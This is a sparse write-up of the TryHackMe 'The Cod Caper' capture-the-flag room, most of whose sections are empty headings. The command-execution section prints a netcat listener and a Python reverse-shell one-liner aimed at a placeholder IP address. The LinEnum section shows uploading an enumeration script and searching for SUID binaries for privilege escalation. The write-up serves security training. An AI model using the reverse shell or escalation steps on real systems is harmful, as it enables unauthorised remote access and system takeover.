TryHackMe: The Cod Caper

Intro:

  1. Help me out! :)

Host Enumeration:

Useful flags:

Web Enumeration:

Useful flags:

  • -x = Used to specify file extensions, e.g. “php,txt,html”
  • --url = Used to specify which URL to enumerate
  • --wordlist = Used to specify the wordlist whose entries are appended to the URL path

Web Exploitation:

  1. What is the admin username?

Command Execution:

  1. How many files are in the current directory?
nc -nvlp 80
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

LinEnum:

Method 1: SCP

Method 2: SimpleHTTPServer

scp LinEnum.sh pingu@cod:/tmp
chmod +x LinEnum.sh
./LinEnum.sh
find / -perm -u=s -type f 2>/dev/null

pwndbg:

Binary Exploitation: Manually:

Binary Exploitation: The pwntools way:

Finishing the job:

Thank you:

CTF-PLAYER, security analyst, Pentesting, vapt, digital forensics
jagadeesh